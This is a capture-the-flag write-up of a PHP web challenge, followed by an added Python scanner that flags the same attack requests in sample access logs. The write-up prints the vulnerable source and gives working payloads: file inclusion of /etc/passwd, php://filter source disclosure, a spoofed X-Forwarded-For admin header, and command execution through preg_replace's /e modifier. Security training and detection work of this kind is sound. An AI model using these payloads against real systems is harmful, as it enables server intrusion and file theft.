    TheHackerWorld Official


Challenge description

Other attackers will use a backdoor in the Device Maintenance Center of the industrial control cloud management system to break into the system.

Open the challenge

First, click around to see what functionality is available.


Apart from "Device Maintenance Center", nothing responds. That matches the challenge description, so this is where to dig in.

The path is: http://61.147.171.105:50657/index.php

A scan of the back end with Yujian (御剑) turned up nothing of value.

Right-click and view the page source.


Without a second thought, just visit it.

There is output.


Guess: this may be file inclusion

Seeing the page parameter suggests this challenge may be file inclusion, so try changing index to /etc/passwd.

That is almost certainly it.


Use the php:// pseudo-protocol (stream wrapper)

?page=php://filter/read=convert.base64-encode/resource=index.php 


Source obtained

Base64-decode it:

 

<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>

<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>

<body>
<ul class="layui-nav">
<li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
<legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
<!-- the checked state here is only for demonstration -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==10003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
  var table = layui.table,
      form = layui.form;

  table.render({
    elem: '#test',
    url: '/somrthing.json',
    cellMinWidth: 80,
    cols: [
      [
        { type: 'numbers' },
        { type: 'checkbox' },
        { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
        { field: 'name', title: '设备名', templet: '#nameTpl' },
        { field: 'area', title: '区域' },
        { field: 'status', title: '维护状态', minWidth: 120, sort: true },
        { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
      ]
    ],
    page: true
  });
});
</script>
<script>
layui.use('element', function() {
  var element = layui.element; // nav hover effects, sub-menus etc. depend on the element module
  // listen for nav clicks
  element.on('nav(demo)', function(elem) {
    //console.log(elem)
    layer.msg(elem.text());
  });
});
</script>

<?php

$page = $_GET[page];

if (isset($page)) {
  if (ctype_alnum($page)) {
    ?>
    <br /><br /><br /><br />
    <div style="text-align:center">
    <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

    <?php
  } else {
    ?>
    <br /><br /><br /><br />
    <div style="text-align:center">
    <p class="lead">
    <?php

    // blacklist of a few substrings; note strpos() > 0 misses a match at offset 0
    if (strpos($page, 'input') > 0) {
      die();
    }

    if (strpos($page, 'ta:text') > 0) {
      die();
    }

    if (strpos($page, 'text') > 0) {
      die();
    }

    if ($page === 'index.php') {
      die('Ok');
    }
    // user-controlled include(): local file inclusion, and php:// wrappers are not blocked
    include($page);
    die();
    ?>
    </p>
    <br /><br /><br /><br />

    <?php
  }
}

// a convenient input/output feature, still under development, internal testers only

// the "admin" gate trusts a request header the client chooses
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

  echo "<br >Welcome My Admin ! <br >";

  $pattern = $_GET[pat];
  $replacement = $_GET[rep];
  $subject = $_GET[sub];

  // pattern, replacement and subject are all user-controlled
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  } else {
    die();
  }
}
?>
</body>
</html>

 

Code audit

The part that actually matters is just this last bit:

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
  
  echo "<br >Welcome My Admin ! <br >";
  
  $pattern = $_GET[pat];
  $replacement = $_GET[rep];
  $subject = $_GET[sub];
  
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  }else{
    die();
  }
}
?>

 

The request must carry this header: X-Forwarded-For: 127.0.0.1

Next, pay attention to the preg_replace function, a common RCE sink.

preg_replace($pattern, $replacement, $subject) replaces the parts of subject that match pattern with replacement; if the /e modifier is enabled, replacement is executed as PHP code.

RCE

/index.php?pat=//e&rep=system('ls')&sub=1


That solves it.

Run ls on the suspicious entries on the right one by one.

Finally, flag.php is found.

Final answer

?pat=//e&rep=system('cat%20s3chahahaDir/flag/flag.php')&sub=1
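As an added example (not from the original post), here is a Python scanner over constructed access-log lines that flags the three conditions this writeup chains: a wrapper or absolute path in page reaching include(), a user-supplied preg_replace pattern carrying the /e modifier, and an X-Forwarded-For of 127.0.0.1 arriving from a non-loopback source. The log format with a trailing X-Forwarded-For field is an assumption, as is the sample data.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in an assumed custom access-log format: the last quoted
# field is the X-Forwarded-For value the client sent ("-" when absent).
SAMPLE_LOG = """\
198.51.100.7 - - [14/Aug/2022:12:12:37 +0800] "GET /index.php?page=index HTTP/1.1" 200 2048 "-"
198.51.100.7 - - [14/Aug/2022:12:13:02 +0800] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1301 "-"
198.51.100.7 - - [14/Aug/2022:12:13:46 +0800] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 4817 "-"
198.51.100.7 - - [14/Aug/2022:12:14:59 +0800] "GET /index.php?pat=//e&rep=system('ls')&sub=1 HTTP/1.1" 200 612 "127.0.0.1"
203.0.113.9 - - [14/Aug/2022:12:15:23 +0800] "GET /index.php?pat=/foo/i&rep=bar&sub=foo HTTP/1.1" 200 88 "-"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<xff>[^"]*)"$'
)


def php_regex_modifiers(pattern: str) -> str:
    """Modifier letters of a PCRE pattern as PHP's preg_* parse it:
    leading delimiter, body, matching closing delimiter, then modifiers."""
    pattern = pattern.lstrip()
    if not pattern:
        return ""
    end = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(pattern[0], pattern[0])
    close = pattern.rfind(end)
    return pattern[close + 1:] if close > 0 else ""


def inspect_request(src: str, target: str, xff: str) -> list:
    """Flag the three conditions the vulnerable index.php relies on."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for page in qs.get("page", []):          # include($page): wrapper or absolute path
        if "://" in page.lower() or "../" in page or page.startswith("/"):
            findings.append(("lfi", page))
    for pat in qs.get("pat", []):            # user-controlled preg_replace pattern
        if "e" in php_regex_modifiers(pat):  # /e: replacement evaluated as PHP (PHP < 7.0)
            findings.append(("preg_replace_e", pat))
    if xff.strip() == "127.0.0.1" and not src.startswith("127."):
        findings.append(("spoofed_xff", src))  # admin gate trusts a client header
    return findings


def scan_log(text: str) -> list:
    """Return (source_ip, finding, detail) for every flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            for kind, detail in inspect_request(m["src"], m["target"], m["xff"]):
                alerts.append((m["src"], kind, detail))
    return alerts
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so on current PHP the fourth request only produces a warning, but the log still records the attempt and the spoofed header.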
